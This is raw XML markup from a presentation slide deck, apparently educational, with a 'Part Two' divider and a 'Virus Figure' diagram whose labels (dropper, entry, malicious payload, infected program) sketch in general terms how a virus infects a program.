        <p:nvSpPr>
          <p:cNvPr id="5" name="日期占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="6356350"/>
            <a:ext cx="2743200" cy="365125"/>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74E7442A-BA00-4274-AC47-95D95C23D1C8}" type="datetimeFigureOut">
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Segoe UI" panose="020B0502040204020203"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="707653" y="-2"/>
            <a:ext cx="3391877" cy="6858002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="07A7AF">
              <a:alpha val="9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7" name="文本占位符 31"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1289843" y="3127425"/>
            <a:ext cx="2157413" cy="1695450"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="96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rPr>
              <a:t>02</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="9600" b="1" i="0"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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本占位符 31"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1289843" y="2729084"/>
            <a:ext cx="2157413" cy="523631"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2400" b="1" i="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rPr>
              <a:t>Part Two</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2400" b="1" i="1"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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="组合 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1952199" y="2121506"/>
            <a:ext cx="658709" cy="199812"/>
            <a:chOff x="4510429" y="6007426"/>
            <a:chExt cx="658709" cy="199812"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="L 形 9"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1">
              <p:custDataLst>
                <p:tags r:id="rId6"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="13500000">
              <a:off x="4663956"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1" name="L 形 10"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1">
              <p:custDataLst>
                <p:tags r:id="rId7"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="13500000">
              <a:off x="4818077"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2" name="L 形 11"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1">
              <p:custDataLst>
                <p:tags r:id="rId8"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="13500000">
              <a:off x="4972199" y="6008864"/>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3" name="直角三角形 12"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1">
              <p:custDataLst>
                <p:tags r:id="rId9"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="13500000">
              <a:off x="4510429" y="6007426"/>
              <a:ext cx="199812" cy="199812"/>
            </a:xfrm>
            <a:prstGeom prst="rtTriangle">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="06DCA9">
                <a:lumMod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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="矩形 13"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId10"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="545426" y="-2"/>
            <a:ext cx="101886" cy="6858002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="80000">
                <a:srgbClr val="07A7AF"/>
              </a:gs>
              <a:gs pos="0">
                <a:srgbClr val="07A7AF">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="54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5" name="矩形 14"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId11"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4158103" y="-2"/>
            <a:ext cx="101886" cy="6858002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="80000">
                <a:srgbClr val="07A7AF"/>
              </a:gs>
              <a:gs pos="0">
                <a:srgbClr val="07A7AF">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="54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Virus Figure</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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="24" name="组合 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="491490" y="1527175"/>
            <a:ext cx="4399915" cy="3342640"/>
            <a:chOff x="1711" y="2465"/>
            <a:chExt cx="6929" cy="5264"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="矩形 15"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId1"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3622" y="2465"/>
              <a:ext cx="5018" cy="526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Text Box 8"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId2"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1711" y="2465"/>
              <a:ext cx="1843" cy="628"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Dropper</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="28" name="组合 27"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="5175885" y="1527175"/>
            <a:ext cx="6525260" cy="4701540"/>
            <a:chOff x="8757" y="2425"/>
            <a:chExt cx="10276" cy="7404"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="矩形 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9533" y="2425"/>
              <a:ext cx="5018" cy="5265"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FADB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8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11975" y="3296"/>
              <a:ext cx="2224" cy="997"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="E74C3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800" b="1">
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>Entry</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="圆角矩形 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9534" y="7670"/>
              <a:ext cx="5017" cy="1923"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="D7F2F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2"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId3"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9534" y="8615"/>
              <a:ext cx="5017" cy="978"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="37BEC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000" b="1">
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>Return to infected program</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Text Box 8"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="15283" y="7909"/>
              <a:ext cx="3751" cy="628"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1">
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Malicious Payload</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2000" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Text Box 8"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId5"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14551" y="2425"/>
              <a:ext cx="3552" cy="628"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Infected program</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="18" name="直接连接符 17"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14190" y="3794"/>
              <a:ext cx="1123" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>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custDataLst>
                <p:tags r:id="rId6"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="15311" y="3789"/>
              <a:ext cx="0" cy="6022"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>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custDataLst>
                <p:tags r:id="rId7"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="8773" y="9806"/>
              <a:ext cx="6532" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="2">
              <a:schemeClr val="accent1"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:srgbClr val="FFFFFF"/>
            </a:fillRef>
            <a:effectRef idx="0">
              <a:srgbClr val="FFFFFF"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="21" name="直接连接符 20"/>
            <p:cNvCxnSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId8"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="8760" y="8223"/>
              <a:ext cx="0" cy="1606"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="2">
              <a:schemeClr val="accent1"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:srgbClr val="FFFFFF"/>
            </a:fillRef>
            <a:effectRef idx="0">
              <a:srgbClr val="FFFFFF"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="22" name="直接连接符 21"/>
            <p:cNvCxnSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId9"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="8757" y="8218"/>
              <a:ext cx="1396" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:tailEnd type="triangle" w="lg" len="lg"/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="2">
              <a:schemeClr val="accent1"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:srgbClr val="FFFFFF"/>
            </a:fillRef>
            <a:effectRef idx="0">
              <a:srgbClr val="FFFFFF"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="25" name="直接连接符 24"/>
            <p:cNvCxnSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId10"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="14199" y="9104"/>
              <a:ext cx="737" cy="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custDataLst>
                <p:tags r:id="rId11"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14930" y="5411"/>
              <a:ext cx="13" cy="3693"/>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custDataLst>
                <p:tags r:id="rId12"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="13752" y="5411"/>
              <a:ext cx="1191" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:tailEnd type="triangle" w="lg" len="lg"/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="2">
              <a:schemeClr val="accent1"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:srgbClr val="FFFFFF"/>
            </a:fillRef>
            <a:effectRef idx="0">
              <a:srgbClr val="FFFFFF"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
      </p:gr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679_5*l_h_i*1_1_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20227679"/>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679_5*l_h_i*1_1_3"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20227679"/>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7679_5*l_h_i*1_1_4"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20227679"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_FILL_FORE_SCHEMECOLOR_INDEX" val="14"/>
  <p:tag name="KSO_WM_UNIT_FILL_TYPE" val="1"/>
  <p:tag name="KSO_WM_UNIT_SHADOW_SCHEMECOLOR_INDEX" val="14"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="2"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE" val="1"/>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7679_5*l_h_i*1_1_2"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20227679"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="5"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE" val="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679_5*l_h_i*1_2_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20227679"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_FILL_FORE_SCHEMECOLOR_INDEX" val="6"/>
  <p:tag name="KSO_WM_UNIT_FILL_TYPE" val="1"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="2"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE" val="1"/>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7679_5*l_h_i*1_2_3"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20227679"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_FILL_FORE_SCHEMECOLOR_INDEX" val="6"/>
  <p:tag name="KSO_WM_UNIT_FILL_TYPE" val="1"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="2"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE" val="1"/>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7679_5*l_h_i*1_2_4"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20227679"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_FILL_FORE_SCHEMECOLOR_INDEX" val="14"/>
  <p:tag name="KSO_WM_UNIT_FILL_TYPE" val="1"/>
  <p:tag name="KSO_WM_UNIT_SHADOW_SCHEMECOLOR_INDEX" val="14"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="2"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE" val="1"/>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7679_5*l_h_i*1_2_2"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20227679"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="6"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE" val="1"/>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679_5*l_h_i*1_1_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20227679"/>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679_5*l_h_i*1_1_3"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20227679"/>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7679_5*l_h_i*1_1_4"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20227679"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_FILL_FORE_SCHEMECOLOR_INDEX" val="14"/>
  <p:tag name="KSO_WM_UNIT_FILL_TYPE" val="1"/>
  <p:tag name="KSO_WM_UNIT_SHADOW_SCHEMECOLOR_INDEX" val="14"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="2"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE"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7679_5*l_h_i*1_1_2"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20227679"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="5"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE" val="1"/>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UNIT_TABLE_BEAUTIFY" val="smartTable{b7c07c27-9119-4383-a339-984afdfbad5a}"/>
  <p:tag name="TABLE_ENDDRAG_ORIGIN_RECT" val="847*307"/>
  <p:tag name="TABLE_ENDDRAG_RECT" val="63*150*847*307"/>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UNIT_TABLE_BEAUTIFY" val="smartTable{52e1d9ef-8848-43e8-9c85-4e52e1e2b03a}"/>
  <p:tag name="TABLE_ENDDRAG_ORIGIN_RECT" val="847*307"/>
  <p:tag name="TABLE_ENDDRAG_RECT" val="63*150*847*307"/>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UNIT_TABLE_BEAUTIFY" val="smartTable{9fa216a9-6e7b-486f-aec6-477474317214}"/>
  <p:tag name="TABLE_ENDDRAG_ORIGIN_RECT" val="847*307"/>
  <p:tag name="TABLE_ENDDRAG_RECT" val="63*150*847*307"/>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UNIT_TABLE_BEAUTIFY" val="smartTable{059b1a29-2ef2-4a71-b4fc-3ff26104e41c}"/>
  <p:tag name="TABLE_ENDDRAG_ORIGIN_RECT" val="847*307"/>
  <p:tag name="TABLE_ENDDRAG_RECT" val="63*150*847*307"/>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SPECIAL_SOURCE" val="bdnull"/>
  <p:tag name="KSO_WM_SLIDE_ID" val="diagram20227964_3"/>
  <p:tag name="KSO_WM_TEMPLATE_SUBCATEGORY" val="0"/>
  <p:tag name="KSO_WM_TEMPLATE_MASTER_TYPE" val="1"/>
  <p:tag name="KSO_WM_TEMPLATE_COLOR_TYPE" val="0"/>
  <p:tag name="KSO_WM_SLIDE_INDEX" val="3"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="#wm#"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20227964"/>
  <p:tag name="KSO_WM_SLIDE_TYPE" val="text"/>
  <p:tag name="KSO_WM_SLIDE_SUBTYPE" val="diag"/>
  <p:tag name="KSO_WM_SLIDE_ITEM_CNT" val="3"/>
